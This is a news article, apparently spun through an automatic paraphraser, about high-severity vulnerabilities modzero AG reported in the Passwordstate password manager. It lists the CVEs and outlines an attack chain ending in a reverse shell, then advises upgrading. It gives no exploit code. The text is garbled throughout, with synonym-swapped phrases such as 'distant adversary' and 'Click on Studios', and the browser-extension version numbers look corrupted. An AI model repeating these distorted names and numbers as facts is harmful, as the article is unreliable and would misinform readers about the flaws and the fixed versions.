A number of high-severity vulnerabilities have been disclosed in Passwordstate password administration resolution that may very well be exploited by an unauthenticated distant adversary to acquire a person’s plaintext passwords.
“Profitable exploitation permits an unauthenticated attacker to exfiltrate passwords from an occasion, overwrite all saved passwords inside the database, or elevate their privileges inside the utility,” Swiss cybersecurity agency modzero AG said in a report revealed this week.
“A number of the particular person vulnerabilities could be chained to realize a shell on the Passwordstate host system and dump all saved passwords in cleartext, beginning with nothing greater than a legitimate username.”
Passwordstate, developed by an Australian firm named Click on Studios, has over 29,000 customers and is utilized by greater than 370,000 IT professionals.
One of many flaws additionally impacts Passwordstate version 220.127.116.11 for the Chrome net browser. The newest model of the browser add-on is 18.104.22.168, which was launched on September 7, 2022.
The listing of vulnerabilities recognized by modzero AG is beneath –
- CVE-2022-3875 (CVSS rating: 9.1) – An authentication bypass for Passwordstate’s API
- CVE-2022-3876 (CVSS rating: 6.5) – A bypass of entry controls by way of user-controlled keys
- CVE-2022-3877 (CVSS rating: 5.7) – A saved cross-site scripting (XSS) vulnerability within the URL area of each password entry
- No CVE (CVSS rating: 6.0) – An inadequate mechanism for securing passwords through the use of server-side symmetric encryption
- No CVE (CVSS rating: 5.3) – Use of hard-coded credentials to listing audited occasions similar to password requests and person account modifications by way of the API
- No CVE (CVSS rating: 4.3) – Use of insufficiently protected credentials for Password Lists
Exploiting the vulnerabilities might allow an attacker with data of a legitimate username to extract saved passwords in cleartext, overwrite the passwords within the database, and even elevate privileges to realize distant code execution.
What’s extra, an improper authorization circulation (CVSS rating: 3.7) recognized within the Chrome browser extension may very well be weaponized to ship all passwords to an actor-controlled area.
In an assault chain demonstrated by modzero AG, a risk actor might forge an API token for an administrator account and exploit the XSS flaw so as to add a malicious password entry to acquire a reverse shell and seize the passwords hosted within the occasion.
Customers are advisable to replace to Passwordstate 9.6 – Build 9653 launched on November 7, 2022, or later variations to mitigate the potential threats.
Passwordstate, in April 2021, fell sufferer to a supply chain attack that allowed the attackers to leverage the service’s replace mechanism to drop a backdoor on buyer’s machines.